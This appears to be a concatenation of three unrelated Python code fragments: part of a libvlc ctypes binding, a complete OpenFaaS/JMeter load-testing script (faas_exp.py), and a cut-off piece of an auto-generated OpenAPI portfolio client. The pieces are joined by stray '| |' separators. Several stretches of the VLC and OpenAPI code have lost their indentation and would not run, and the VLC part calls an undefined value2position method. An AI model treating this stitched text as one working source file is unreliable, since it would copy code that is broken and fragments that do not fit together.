@return: duration of media item
"""
e=VLCException()
return libvlc_media_get_duration(self, e)
if hasattr(dll, 'libvlc_media_is_preparsed'):
def is_preparsed(self):
"""Get preparsed status for media descriptor object.
@return: true if media object has been preparsed otherwise it returns false
"""
e=VLCException()
return libvlc_media_is_preparsed(self, e)
if hasattr(dll, 'libvlc_media_set_user_data'):
def set_user_data(self, p_new_user_data):
"""Sets media descriptor's user_data. user_data is specialized data
accessed by the host application, VLC.framework uses it as a pointer to
an native object that references a libvlc_media_t pointer
@param p_new_user_data: pointer to user data
"""
e=VLCException()
return libvlc_media_set_user_data(self, p_new_user_data, e)
if hasattr(dll, 'libvlc_media_get_user_data'):
def get_user_data(self):
"""Get media descriptor's user_data. user_data is specialized data
accessed by the host application, VLC.framework uses it as a pointer to
an native object that references a libvlc_media_t pointer
"""
e=VLCException()
return libvlc_media_get_user_data(self, e)
if hasattr(dll, 'libvlc_media_player_new_from_media'):
def player_new_from_media(self):
"""Create a Media Player object from a Media
"""
e=VLCException()
return libvlc_media_player_new_from_media(self, e)
class MediaControl(object):
    """Create a new MediaControl instance
    It may take as parameter either:
    - a string
    - a list of strings as first parameters
    - the parameters given as the constructor parameters (must be strings)
    - a vlc.Instance
    """
    @staticmethod
    def from_param(arg):
        '''(INTERNAL) ctypes parameter conversion method.
        '''
        return arg._as_parameter_
    # NOTE(review): __new__ relies on the Python 2-only builtins ``long``
    # and ``basestring``; on Python 3 these raise NameError — confirm this
    # module targets Python 2 only.
    def __new__(cls, *p):
        # Dispatch on the constructor arguments: 0/NULL -> None, an int
        # pointer -> wrap it, a string -> split into a parameter line,
        # an Instance -> build from that instance, otherwise build a new
        # mediacontrol from the (possibly defaulted) parameter list.
        if p and p[0] == 0:
            return None
        elif p and isinstance(p[0], (int, long)):
            # instance creation from ctypes
            o=object.__new__(cls)
            o._as_parameter_=ctypes.c_void_p(p[0])
            return o
        elif len(p) == 1 and isinstance(p[0], basestring):
            # Only 1 string parameter: should be a parameter line
            p=p[0].split(' ')
        elif len(p) == 1 and isinstance(p[0], (tuple, list)):
            p=p[0]
        if p and isinstance(p[0], Instance):
            e=MediaControlException()
            return mediacontrol_new_from_instance(p[0], e)
        else:
            if not p and detected_plugin_path is not None:
                # No parameters passed. Under win32 and MacOS, specify
                # the detected_plugin_path if present.
                p=[ 'vlc', '--plugin-path='+ detected_plugin_path ]
            e=MediaControlException()
            return mediacontrol_new(len(p), p, e)
    def get_media_position(self, origin=PositionOrigin.AbsolutePosition, key=PositionKey.MediaTime):
        # Returns the dereferenced position structure, or None when the
        # C call yields a NULL pointer.
        e=MediaControlException()
        p=mediacontrol_get_media_position(self, origin, key, e)
        if p:
            return p.contents
        else:
            return None
    def set_media_position(self, pos):
        """Set the media position.
        @param pos: a MediaControlPosition or an integer (in ms)
        """
        if not isinstance(pos, MediaControlPosition):
            pos=MediaControlPosition(long(pos))
        e=MediaControlException()
        mediacontrol_set_media_position(self, pos, e)
    def start(self, pos=0):
        """Start the player at the given position.
        @param pos: a MediaControlPosition or an integer (in ms)
        """
        if not isinstance(pos, MediaControlPosition):
            pos=MediaControlPosition(long(pos))
        e=MediaControlException()
        mediacontrol_start(self, pos, e)
    def snapshot(self, pos=0):
        """Take a snapshot.
        Note: the position parameter is not properly implemented. For
        the moment, the only valid position is the 0-relative position
        (i.e. the current position).
        @param pos: a MediaControlPosition or an integer (in ms)
        """
        if not isinstance(pos, MediaControlPosition):
            pos=MediaControlPosition(long(pos))
        e=MediaControlException()
        p=mediacontrol_snapshot(self, pos, e)
        if p:
            snap=p.contents
            # FIXME: there is a bug in the current mediacontrol_snapshot
            # implementation, which sets an incorrect date.
            # Workaround here:
            snap.date=self.get_media_position().value
            return snap
        else:
            return None
    def display_text(self, message='', begin=0, end=1000):
        """Display a caption between begin and end positions.
        @param message: the caption to display
        @param begin: the begin position
        @param end: the end position
        """
        # NOTE(review): value2position is not defined anywhere in this
        # class — confirm it exists elsewhere, otherwise this path
        # raises AttributeError for non-position begin/end values.
        if not isinstance(begin, MediaControlPosition):
            begin=self.value2position(begin)
        if not isinstance(end, MediaControlPosition):
            end=self.value2position(end)
        e=MediaControlException()
        mediacontrol_display_text(self, message, begin, end, e)
    def get_stream_information(self, key=PositionKey.MediaTime):
        """Return information about the stream.
        """
        e=MediaControlException()
        return mediacontrol_get_stream_information(self, key, e).contents
    # The following methods are only defined when the loaded dll
    # actually exports the corresponding C symbol.
    if hasattr(dll, 'mediacontrol_get_libvlc_instance'):
        def get_instance(self):
            """Get the associated libvlc instance
            @return: a libvlc instance
            """
            return mediacontrol_get_libvlc_instance(self)
    if hasattr(dll, 'mediacontrol_get_media_player'):
        def get_media_player(self):
            """Get the associated libvlc_media_player
            @return: a libvlc_media_player_t instance
            """
            return mediacontrol_get_media_player(self)
    if hasattr(dll, 'mediacontrol_pause'):
        def pause(self):
            """Pause the movie at a given position
            """
            e=MediaControlException()
            return mediacontrol_pause(self, e)
    if hasattr(dll, 'mediacontrol_resume'):
        def resume(self):
            """Resume the movie at a given position
            """
            e=MediaControlException()
            return mediacontrol_resume(self, e)
    if hasattr(dll, 'mediacontrol_stop'):
        def stop(self):
            """Stop the movie at a given position
            """
            e=MediaControlException()
            return mediacontrol_stop(self, e)
    if hasattr(dll, 'mediacontrol_exit'):
        def exit(self):
            """Exit the player
            """
            return mediacontrol_exit(self)
    if hasattr(dll, 'mediacontrol_set_mrl'):
        def set_mrl(self, psz_file):
            """Set the MRL to be played.
            @param psz_file: the MRL
            """
            e=MediaControlException()
            return mediacontrol_set_mrl(self, psz_file, e)
    if hasattr(dll, 'mediacontrol_get_mrl'):
        def get_mrl(self):
            """Get the MRL to be played.
            """
            e=MediaControlException()
            return mediacontrol_get_mrl(self, e)
    if hasattr(dll, 'mediacontrol_sound_get_volume'):
        def sound_get_volume(self):
            """Get the current audio level, normalized in [0..100]
            @return: the volume
            """
            e=MediaControlException()
            return mediacontrol_sound_get_volume(self, e)
    if hasattr(dll, 'mediacontrol_sound_set_volume'):
        def sound_set_volume(self, volume):
            """Set the audio level
            @param volume: the volume (normalized in [0..100])
            """
            e=MediaControlException()
            return mediacontrol_sound_set_volume(self, volume, e)
    if hasattr(dll, 'mediacontrol_set_visual'):
        def set_visual(self, visual_id):
            """Set the video output window
            @param visual_id: the Xid or HWND, depending on the platform
            """
            e=MediaControlException()
            return mediacontrol_set_visual(self, visual_id, e)
    if hasattr(dll, 'mediacontrol_get_rate'):
        def get_rate(self):
            """Get the current playing rate, in percent
            @return: the rate
            """
            e=MediaControlException()
            return mediacontrol_get_rate(self, e)
    if hasattr(dll, 'mediacontrol_set_rate'):
        def set_rate(self, rate):
            """Set the playing rate, in percent
            @param rate: the desired rate
            """
            e=MediaControlException()
            return mediacontrol_set_rate(self, rate, e)
    if hasattr(dll, 'mediacontrol_get_fullscreen'):
        def get_fullscreen(self):
            """Get current fullscreen status
            @return: the fullscreen status
            """
            e=MediaControlException()
            return mediacontrol_get_fullscreen(self, e)
    if hasattr(dll, 'mediacontrol_set_fullscreen'):
        def set_fullscreen(self, b_fullscreen):
            """Set fullscreen status
            @param b_fullscreen: the desired status
            """
            e=MediaControlException()
            return mediacontrol_set_fullscreen(self, b_fullscreen, e)
class MediaDiscoverer(object):
    """Ctypes wrapper around a libvlc media service discoverer pointer."""
    def __new__(cls, pointer=None):
        '''Internal method used for instanciating wrappers from ctypes.
        '''
        if pointer is None:
            raise Exception("Internal method. Surely this class cannot be instanciated by itself.")
        if pointer == 0:
            # A NULL pointer from the C side maps to None, not a wrapper.
            return None
        else:
            o=object.__new__(cls)
            o._as_parameter_=ctypes.c_void_p(pointer)
            return o
    @staticmethod
    def from_param(arg):
        '''(INTERNAL) ctypes parameter conversion method.
        '''
        return arg._as_parameter_
    # Methods below exist only when the loaded dll exports the symbol.
    if hasattr(dll, 'libvlc_media_discoverer_release'):
        def release(self):
            """Release media discover object. If the reference count reaches 0, then
            the object will be released.
            """
            return libvlc_media_discoverer_release(self)
    if hasattr(dll, 'libvlc_media_discoverer_localized_name'):
        def localized_name(self):
            """Get media service discover object its localized name.
            @return: localized name
            """
            return libvlc_media_discoverer_localized_name(self)
    if hasattr(dll, 'libvlc_media_discoverer_media_list'):
        def media_list(self):
            """Get media service discover media list.
            @return: list of media items
            """
            return libvlc_media_discoverer_media_list(self)
    if hasattr(dll, 'libvlc_media_discoverer_event_manager'):
        def event_manager(self):
            """Get event manager from media service discover object.
            @return: event manager object.
            """
            return libvlc_media_discoverer_event_manager(self)
    if hasattr(dll, 'libvlc_media_discoverer_is_running'):
        def is_running(self):
            """Query if media service discover object is running.
            @return: true if running, false if not
            """
            return libvlc_media_discoverer_is_running(self)
class MediaLibrary(object):
    """Ctypes wrapper around a libvlc media library pointer."""
    def __new__(cls, pointer=None):
        '''Internal method used for instanciating wrappers from ctypes.
        '''
        if pointer is None:
            raise Exception("Internal method. Surely this class cannot be instanciated by itself.")
        if pointer == 0:
            # A NULL pointer from the C side maps to None, not a wrapper.
            return None
        else:
            o=object.__new__(cls)
            o._as_parameter_=ctypes.c_void_p(pointer)
            return o
    @staticmethod
    def from_param(arg):
        '''(INTERNAL) ctypes parameter conversion method.
        '''
        return arg._as_parameter_
    # Methods below exist only when the loaded dll exports the symbol.
    if hasattr(dll, 'libvlc_media_library_release'):
        def release(self):
            """Release media library object. This functions decrements the
            reference count of the media library object. If it reaches 0,
            then the object will be released.
            """
            return libvlc_media_library_release(self)
    if hasattr(dll, 'libvlc_media_library_retain'):
        def retain(self):
            """Retain a reference to a media library object. This function will
            increment the reference counting for this object. Use
            libvlc_media_library_release() to decrement the reference count.
            """
            return libvlc_media_library_retain(self)
    if hasattr(dll, 'libvlc_media_library_load'):
        def load(self):
            """Load media library.
            """
            e=VLCException()
            return libvlc_media_library_load(self, e)
    if hasattr(dll, 'libvlc_media_library_save'):
        def save(self):
            """Save media library.
            """
            e=VLCException()
            return libvlc_media_library_save(self, e)
    if hasattr(dll, 'libvlc_media_library_media_list'):
        def media_list(self):
            """Get media library subitems.
            @return: media list subitems
            """
            e=VLCException()
            return libvlc_media_library_media_list(self, e)
class MediaList(object):
def __new__(cls, pointer=None):
'''Internal method used for instanciating wrappers from ctypes.
'''
if pointer is None:
raise Exception("Internal method. Surely this class cannot be instanciated by itself.")
if pointer == 0:
return None
else:
o=object.__new__(cls)
o._as_parameter_=ctypes.c_void_p(pointer)
return o
@staticmethod
def from_param(arg):
'''(INTERNAL) ctypes parameter conversion method.
'''
return arg._as_parameter_
if hasattr(dll, 'libvlc_media_list_release'):
def release(self):
"""Release media list created with libvlc_media_list_new().
"""
return libvlc_media_list_release(self)
if hasattr(dll, 'libvlc_media_list_retain'):
def retain(self):
"""Retain reference to a media list
"""
return libvlc_media_list_retain(self)
if hasattr(dll, 'libvlc_media_list_set_media'):
def set_media(self, p_mi):
"""Associate media instance with this media list instance.
If another media instance was | |
# faas_exp.py
import os
import sys
import time
import datetime
import csv
import json
import logging
import subprocess
import io
from statistics import median
from pathlib import Path
import click
import requests
import pandas as pd
import numpy as np
from scipy.stats import wilcoxon as wilcoxon_cal
from scipy.stats import mannwhitneyu
from jinja2 import Environment, FileSystemLoader
from config import Config
from figures import plot_bar_figure
from functions import (
SAMPLE,
FUNCTIONS,
FRAMEWORKS,
CASES,
SUMMARY,
MEDIAN_ACTION,
SUMMARY_ACTION,
WILCOXON_ACTION,
WARMS
)
# Load the experiment configuration (server, functions, run counts, ...).
config = Config()
# Prepare a module-level logger that mirrors everything to stdout.
logger = logging.getLogger(__name__)
# Set the logger level
logger.setLevel(logging.DEBUG)
# Create handlers
handler = logging.StreamHandler(sys.stdout)
handler.setLevel(logging.DEBUG)
# Create formatter
formatter = logging.Formatter(
    '%(asctime)s - %(name)s - %(levelname)s - %(message)s'
)
# Set formatter
handler.setFormatter(formatter)
# Add handler to the logger
logger.addHandler(handler)
# Well-known directories, all resolved relative to this file.
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
JMETER_DIR = os.path.join(BASE_DIR, 'jmeter')
RESULTS_DIR = os.path.join(BASE_DIR, 'results')
FIGURES_DIR = os.path.join(BASE_DIR, 'figures')
SUMMARY_DIR = os.path.join(BASE_DIR, 'summary')
WILCOXON_DIR = os.path.join(BASE_DIR, 'wilcoxon')
# Maps a scenario name (replica / concurrent-user case) to its count as
# a string — presumably used as human-readable labels; confirm usage in
# figures/summary generation.
CASES_DESC = {
    'replica1': '1',
    'replica10': '10',
    'replica20': '20',
    'user_5': '5',
    'user_10': '10',
    'user_20': '20',
    'user_50': '50'
}
def _get_iqr_limits(_dataset):
q1 = np.percentile(_dataset, 25, interpolation='midpoint')
q3 = np.percentile(_dataset, 75, interpolation='midpoint')
iqr = q3 - q1
print('IQR is {0}'.format(iqr))
if iqr == 0.0:
return 0, 0
lower_limit = q1 - (1.5 * iqr)
upper_limit = q3 + (1.5 * iqr)
print('Lower Limit is {0}'.format(lower_limit))
print('Upper Limit is {0}'.format(upper_limit))
return lower_limit, upper_limit
def _remove_outliers_from_dataset(_dataset):
_updated_dataset = []
outliers = []
lower_limit, upper_limit = _get_iqr_limits(_dataset)
if lower_limit == 0 and upper_limit == 0:
return _dataset
for x in _dataset:
if lower_limit < x < upper_limit:
_updated_dataset.append(x)
else:
outliers.append(x)
if not _updated_dataset:
print('All datasets are outliers :P:P:P')
return _updated_dataset
def _is_cold_start_enabled(function):
return True if \
function.get('inactivity_duration') \
and function.get('chunks_number') else False
def _execute_command(command, cwd=None, ignore_log=False):
subprocess_args = {
'args': command.split(),
'stdout': subprocess.PIPE,
'stderr': subprocess.PIPE,
'cwd': cwd
}
if not ignore_log:
logger.debug('Running command {0}.'.format(command))
process = subprocess.Popen(**subprocess_args)
output, error = process.communicate()
if not ignore_log:
logger.info('command: {0} '.format(repr(command)))
logger.info('output: {0} '.format(output.decode('utf-8')))
logger.error('error: {0} '.format(error.decode('utf-8')))
logger.info('process.returncode: {0} '.format(process.returncode))
if process.returncode:
return False
return output
def _creat_dir(dir_path):
    """Create directory *dir_path* unless it already exists.

    Uses EAFP so a directory created between a check and the mkdir
    (e.g. by a parallel run) is not reported as an error; a pre-existing
    *file* at the path still raises, as before.

    :param dir_path: directory to create (single level, not nested).
    """
    try:
        os.mkdir(dir_path)
        logger.info('Directory {} created successfully'.format(dir_path))
    except FileExistsError:
        if not os.path.isdir(dir_path):
            # The path exists but is not a directory: genuine error.
            raise
        logger.info('Directory {} is already existed'.format(dir_path))
def _create_nested_dir(dir_path):
    """Create *dir_path*, including any missing parent directories."""
    Path(dir_path).mkdir(parents=True, exist_ok=True)
    logger.info('Directory {} created successfully'.format(dir_path))
def _clean_properties_file():
    """Delete the generated JMeter properties file."""
    prop_file = os.path.join(JMETER_DIR, 'properties/config.properties')
    os.remove(prop_file)
def _get_experiment_config():
    # Shortcut for the global 'experiment' section of the loaded Config
    # (server, port, number_of_requests, number_of_runs, ...).
    return config['experiment']
def _get_function_endpoint(function):
    """Build the HTTP method/URL pair used to probe *function*.

    :param function: function description from the config; its 'api'
        section supplies the HTTP method, URI and optional 'param'.
    :return: dict with 'http_method' and 'endpoint' keys.
    """
    experiment = _get_experiment_config()
    func = {
        'http_method': function['api']['http_method']
    }
    uri_path = function['api']['uri']
    if function['api'].get('param'):
        # Probe with the minimum parameter value.  Use get() so reading
        # the default does not mutate the caller's config — the previous
        # setdefault() silently wrote 'min' back into it.
        param = function['api']['param'].get('min', '1')
        uri_path = '{path}?param={param}'.format(
            path=uri_path, param=param)
    endpoint = 'http://{server}:{port}/{uri_path}'.format(
        server=experiment['server'],
        port=experiment['port'],
        uri_path=uri_path
    )
    func['endpoint'] = endpoint
    return func
def _get_dependency_function(function_name):
    """Return the configured function named *function_name*, or None."""
    return next(
        (f for f in config['functions'] if f['name'] == function_name),
        None
    )
def _wait_function_status_code(
        endpoint,
        http_method,
        stop_status,
        check_status,
        data=None):
    """Poll *endpoint* until it answers with one of *stop_status*.

    :param endpoint: full URL of the function to probe.
    :param http_method: HTTP verb understood by ``requests`` ('GET', ...).
    :param stop_status: status codes meaning the function is ready.
    :param check_status: status codes meaning "not deployed yet, retry".
    :param data: optional request body sent with every probe.
    :return: True once a stop status is observed.
    :raises Exception: on any status code outside stop/check/502.

    NOTE(review): this polls forever if the function never becomes
    ready — confirm the surrounding experiment tooling provides a
    timeout.
    """
    # Hoist the loop invariants: the requests method and the request
    # keyword arguments do not change between probes.
    http_call = getattr(requests, http_method.lower())
    attr = {'headers': {'content-type': 'text/plain'}}
    if data:
        attr['data'] = data
    while True:
        response = http_call(endpoint, **attr)
        status_code = response.status_code
        if status_code in check_status:
            logger.info(
                'Function endpoint'
                ' {0} is on {1}'.format(
                    endpoint, status_code))
            time.sleep(5)
        elif status_code in stop_status:
            logger.info(
                'Function endpoint {0} is on {1}'
                ''.format(endpoint, status_code))
            return True
        elif status_code == 502:
            # The gateway answers 502 while the backend is still warming
            # up; back off a little longer before retrying.
            logger.warning(
                'Bad Gateway, something went wrong try again later')
            time.sleep(10)
        else:
            raise Exception(
                'Function {0} return'
                ' status code {1}'.format(
                    endpoint, status_code)
            )
def _generate_file_from_template(context, template_path, generated_path):
    """Render a Jinja2 template to *generated_path*.

    :param context: mapping passed to the template.
    :param template_path: path of the template file; its directory is
        used as the Jinja2 search path.
    :param generated_path: file to write the rendered content to.
    """
    # os.path.split handles bare filenames and OS-specific separators,
    # unlike the previous manual rsplit('/'), which raised IndexError
    # for a template path without a directory component.
    template_dir, template_name = os.path.split(template_path)
    env = Environment(
        autoescape=False,
        trim_blocks=False,
        loader=FileSystemLoader(template_dir)
    )
    content = env.get_template(template_name).render(context)
    with open(generated_path, 'w') as f:
        f.write(content)
def _generate_jmeter_properties_file(function,
                                     number_of_users,
                                     number_of_requests=None):
    """Render jmeter/properties/config.properties for one load test.

    :param function: function description (api section, optional data).
    :param number_of_users: number of concurrent JMeter threads.
    :param number_of_requests: total requests to issue; defaults to the
        experiment-wide 'number_of_requests' setting.
    :return: path of the generated properties file.
    """
    template_path = os.path.join(
        JMETER_DIR, 'properties/config.properties.j2'
    )
    experiment = _get_experiment_config()
    if not number_of_requests:
        number_of_requests = experiment['number_of_requests']
    context = {
        'number_of_users': number_of_users,
        # NOTE(review): integer division — loop_count becomes 0 when
        # number_of_users exceeds number_of_requests; confirm configs
        # always keep requests >= users.
        'loop_count': int(number_of_requests/number_of_users),
        'server': experiment['server'],
        'port': experiment['port'],
        'http_method': function['api']['http_method'],
        'path': function['api']['uri']
    }
    if function.get('data'):
        context['data'] = function['data']
    prop_file = os.path.join(JMETER_DIR, 'properties/config.properties')
    _generate_file_from_template(context, template_path, prop_file)
    return prop_file
def _generate_jmeter_jmx_file(function):
    """Render jmeter/jmx/faas.jmx for *function*'s API.

    When the API declares a 'param' section the rendered path embeds a
    JMeter ${__Random(min,max)} expression so each request picks a
    random parameter value; otherwise the plain ${__P(path)} property
    placeholder is rendered.

    :return: path of the generated jmx file.
    """
    # This will passed to the jmx file if no param passed
    template_path = os.path.join(
        JMETER_DIR, 'jmx/faas.jmx.j2'
    )
    path = '${__P(path)}'
    if function['api'].get('param'):
        param = function['api']['param']
        # NOTE(review): setdefault writes the defaults back into the
        # shared config, so later readers also see min='1'/max='3' —
        # confirm this persistence is intended.
        min_param = param.setdefault('min', '1')
        max_param = param.setdefault('max', '3')
        path = '{0}?param=${{__Random({1},{2})}}' \
               ''.format(path,
                         min_param,
                         max_param)
    context = {
        'path': path
    }
    jmx_file = os.path.join(JMETER_DIR, 'jmx/faas.jmx')
    _generate_file_from_template(context, template_path, jmx_file)
    return jmx_file
def _deploy_function(function_path, labels=None, env=None):
    """Deploy a function through faas-cli.

    :param function_path: path of the function's YAML descriptor.
    :param labels: optional list of 'key=value' label strings.
    :param env: optional mapping of environment variables to set.
    :raises Exception: when the faas-cli invocation fails.

    NOTE(review): _execute_command splits the command on whitespace, so
    label or env values containing spaces would break the invocation.
    NOTE(review): single-dash '-yaml' — faas-cli documents '-f/--yaml';
    confirm this spelling is accepted by the CLI version in use.
    """
    labels_to_add = ''
    envs_to_add = ''
    labels = labels or []
    env = env or {}
    for label in labels:
        labels_to_add += ' --label {0}'.format(label)
    command = 'faas-cli deploy -yaml {0}'.format(function_path)
    if labels_to_add:
        command = '{command}{labels}'.format(
            command=command, labels=labels_to_add
        )
    for key, value in env.items():
        envs_to_add += ' --env {key}={value}'.format(key=key, value=value)
    if envs_to_add:
        command = '{command}{envs}'.format(
            command=command, envs=envs_to_add
        )
    logger.info(command)
    output = _execute_command(command, cwd=BASE_DIR)
    if not output:
        raise Exception(
            'Error when trying to deploy function {0}'.format(function_path)
        )
    logger.info('Deploy function {0} successfully'.format(function_path))
def _remove_function(name):
    """Undeploy the OpenFaaS function called *name*."""
    command = 'faas-cli remove {}'.format(name)
    logger.info(command)
    if not _execute_command(command):
        raise Exception(
            'Error when trying to remove function {0}'.format(name)
        )
    logger.info('Remove function {0} successfully'.format(name))
def _run_load_test(function, properties_path, result_path):
    """Execute one non-GUI JMeter run and write its report under *result_path*."""
    report_dir = os.path.join(result_path, 'results')
    # The summary .jtl sits next to the 'results' report directory.
    summary_file = os.path.join(os.path.dirname(report_dir), 'summary.jtl')
    jmx_path = _generate_jmeter_jmx_file(function)
    command = (
        'jmeter -n -t {0} -p {1} -l {2} -e -o {3}'
        .format(jmx_path, properties_path, summary_file, report_dir)
    )
    logger.info('Running {0}'.format(command))
    if not _execute_command(command):
        raise Exception('Failure while trying to run {}'.format(command))
def _execute_with_auto_scaling(function_dir,
                               function,
                               load_type,
                               number_of_users):
    """Run the auto-scaling test suite for one function.

    Deploys the function once, waits until it answers 200, then for every
    user count in ``number_of_users`` performs ``number_of_runs`` JMeter
    runs (optionally split into alternating warm/cold chunks), and finally
    removes the function and waits until it returns 404.

    :param function_dir: directory under which result folders are created.
    :param function: function configuration dict (name, yaml_path, api, ...).
    :param load_type: label used for logging only (e.g. 'parallel').
    :param number_of_users: iterable of concurrent-user counts to test.
    """
    function_name = function['name']
    logger.info(
        'Start running {0} '
        'auto scaling test cases for {1}'
        ''.format(load_type, function_name)
    )
    load_type_path = os.path.join(function_dir, 'autoscaling')
    _creat_dir(load_type_path)
    # Deploy function
    _deploy_function(function['yaml_path'], env=function.get('environment'))
    endpoint = _get_function_endpoint(function)
    # Block until the function responds 200 (404 means not ready yet).
    _wait_function_status_code(
        endpoint['endpoint'],
        endpoint['http_method'],
        stop_status=[200],
        check_status=[404],
        data=function.get('data')
    )
    experiment = _get_experiment_config()
    number_of_runs = experiment['number_of_runs']
    for user in number_of_users:
        user_path = os.path.join(
            load_type_path, 'user_{}'.format(user)
        )
        _creat_dir(user_path)
        # Prepare jmeter configuration
        prop_file = _generate_jmeter_properties_file(function, user)
        logger.info('This is the prop file {}'.format(prop_file))
        logger.info('Testing with number of users: {}'.format(user))
        for run_number in range(1, number_of_runs + 1):
            logger.info('Testing run # {}'.format(run_number))
            run_path = os.path.join(user_path, str(run_number))
            _creat_dir(run_path)
            if _is_cold_start_enabled(function):
                # Split the requests evenly over warm/cold chunk pairs;
                # even index -> warm, odd index -> cold (preceded by an
                # idle wait so the function scales down first).
                chunks_number = int(function['chunks_number'])
                chunk_requests = int(
                    experiment['number_of_requests'] / chunks_number
                )
                for chunk in range(int(chunks_number / 2)):
                    for index in range(2):
                        chunk_name = "warm_{0}" \
                            if index % 2 == 0 else "cold_{0}"
                        chunk_name = chunk_name.format(chunk)
                        chunk_path = os.path.join(run_path, chunk_name)
                        _creat_dir(chunk_path)
                        # Only wait when the chunk_name is cold
                        if 'cold' in chunk_name:
                            # Wait before sending any requests
                            delay = int(function['inactivity_duration']) + 1
                            logger.info(
                                'Wait Cold start time {0}m'.format(delay)
                            )
                            time.sleep(delay * 60)
                        # Override the prop file
                        prop_file = _generate_jmeter_properties_file(
                            function,
                            user,
                            number_of_requests=chunk_requests
                        )
                        _run_load_test(function, prop_file, chunk_path)
            else:
                _run_load_test(function, prop_file, run_path)
            # Before move to the next run wait a little bit
            delay = experiment['delay_between_runs']
            logger.info(
                'Wait {0} minutes before run next run'.format(delay)
            )
            time.sleep(int(delay) * 60)
    _remove_function(function_name)
    # Wait until the function is actually gone (404); 200/500/502 mean it
    # is still reachable or tearing down.
    _wait_function_status_code(
        endpoint['endpoint'],
        endpoint['http_method'],
        stop_status=[404],
        check_status=[200, 500, 502],
        data=function.get('data')
    )
    _clean_properties_file()
def _execute_without_auto_scaling(function_dir,
                                  function,
                                  load_type):
    """Run the fixed-replica (no auto scaling) test suite for one function.

    For every replica count in the experiment config, the function is
    deployed with ``com.openfaas.scale.min``/``max`` pinned to that count,
    load-tested for ``number_of_runs`` runs (optionally in warm/cold
    chunks), then removed before the next replica count is tried.

    :param function_dir: directory under which result folders are created.
    :param function: function configuration dict (name, yaml_path, api, ...).
    :param load_type: 'parallel' uses 15 users, anything else uses 1.
    """
    function_name = function['name']
    logger.info(
        'Start running {0} '
        ' without auto scaling '
        'test cases for {1}'
        ''.format(load_type, function_name)
    )
    # This is for number of users we should have
    number_of_users = 1
    if load_type == 'parallel':
        number_of_users = 15
    noautoscaling_path = os.path.join(function_dir, 'noautoscaling')
    _creat_dir(noautoscaling_path)
    experiment = _get_experiment_config()
    number_of_runs = experiment['number_of_runs']
    replicas = experiment['replicas']
    # Prepare jmeter configuration
    for replica in replicas:
        replica_path = os.path.join(
            noautoscaling_path, 'replica{}'.format(replica)
        )
        _creat_dir(replica_path)
        # Deploy function
        # Pin min == max so OpenFaaS keeps exactly `replica` instances.
        _deploy_function(
            function['yaml_path'],
            labels=['com.openfaas.scale.max={}'.format(replica),
                    'com.openfaas.scale.min={}'.format(replica)],
            env=function.get('environment')
        )
        endpoint = _get_function_endpoint(function)
        # Block until the function responds 200 (404 means not ready yet).
        _wait_function_status_code(
            endpoint['endpoint'],
            endpoint['http_method'],
            stop_status=[200],
            check_status=[404],
            data=function.get('data')
        )
        prop_file = _generate_jmeter_properties_file(function, number_of_users)
        # Wait for replica to init
        time.sleep(5)
        logger.info('Testing with replica: {}'.format(replica))
        for run_number in range(1, number_of_runs + 1):
            logger.info('Testing run # {}'.format(run_number))
            run_path = os.path.join(replica_path, str(run_number))
            _creat_dir(run_path)
            if _is_cold_start_enabled(function):
                # Even index -> warm chunk, odd index -> cold chunk (cold
                # chunks wait out the inactivity window first).
                chunks_number = int(function['chunks_number'])
                chunk_requests = int(
                    experiment['number_of_requests'] / chunks_number
                )
                for chunk in range(int(chunks_number / 2)):
                    for index in range(2):
                        chunk_name = "warm_{0}" \
                            if index % 2 == 0 else "cold_{0}"
                        chunk_name = chunk_name.format(chunk)
                        chunk_path = os.path.join(run_path, chunk_name)
                        _creat_dir(chunk_path)
                        # Only wait when the chunk_name is cold
                        if 'cold' in chunk_name:
                            # Wait before sending any requests
                            delay = int(function['inactivity_duration']) + 1
                            logger.info(
                                'Wait Cold start time {0}m'.format(delay)
                            )
                            time.sleep(delay * 60)
                        # Override the prop file
                        prop_file = _generate_jmeter_properties_file(
                            function,
                            number_of_users,
                            number_of_requests=chunk_requests
                        )
                        _run_load_test(function, prop_file, chunk_path)
            else:
                _run_load_test(function, prop_file, run_path)
            delay = experiment['delay_between_runs']
            logger.info('Wait {0} minutes before run next run'.format(delay))
            time.sleep(int(delay) * 60)
        _remove_function(function_name)
        # wait before checking if the function removed or not
        # Check if the function already removed or not
        _wait_function_status_code(
            endpoint['endpoint'],
            endpoint['http_method'],
            stop_status=[404],
            check_status=[200, 500, 502],
            data=function.get('data')
        )
    _clean_properties_file()
def _execute_sequential(function_dir, function):
    """Run the sequential (fixed replica, single user) test suite."""
    logger.info('*************** Start sequential test cases ***************')
    target_dir = os.path.join(function_dir, 'sequential')
    _creat_dir(target_dir)
    _execute_without_auto_scaling(target_dir, function, 'sequential')
    logger.info(
        '*************** Finished sequential test cases ***************\n'
    )
def _execute_parallel(function_dir, function):
    """Run the parallel (auto scaling, concurrent users) test suite."""
    logger.info('*************** Start parallel test cases ***************')
    target_dir = os.path.join(function_dir, 'parallel')
    users = _get_experiment_config()['concurrency']
    _creat_dir(target_dir)
    _execute_with_auto_scaling(
        target_dir, function, 'parallel', number_of_users=users
    )
| |
True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
Returns:
ApplyResult[InlineResponse2005]
"""
self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=True, async_req=True)
return self.portfolio_name_list_get_endpoint.call_with_http_info(**kwargs)
def portfolio_name_list_get_with_http_info_async(
self,
**kwargs
) -> "ApplyResult[typing.Tuple[InlineResponse2005, int, typing.MutableMapping]]":
"""List of portfolios. # noqa: E501
List of portfolios. # noqa: E501
This method makes a asynchronous HTTP request. Returns http data, http status and headers, wrapped in ApplyResult
Keyword Args:
attributes ([str]): Limit the attributes returned in the response to the specified set.. [optional]
sort ([str]): Sortable attributes. The sort order is ascending unless it is prefixed with a minus sign, in which case it is descending. A list of at most 2 (possibly prefixed) attribute name(s) is allowed.. [optional] if omitted the server will use the default value of ["name"]
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
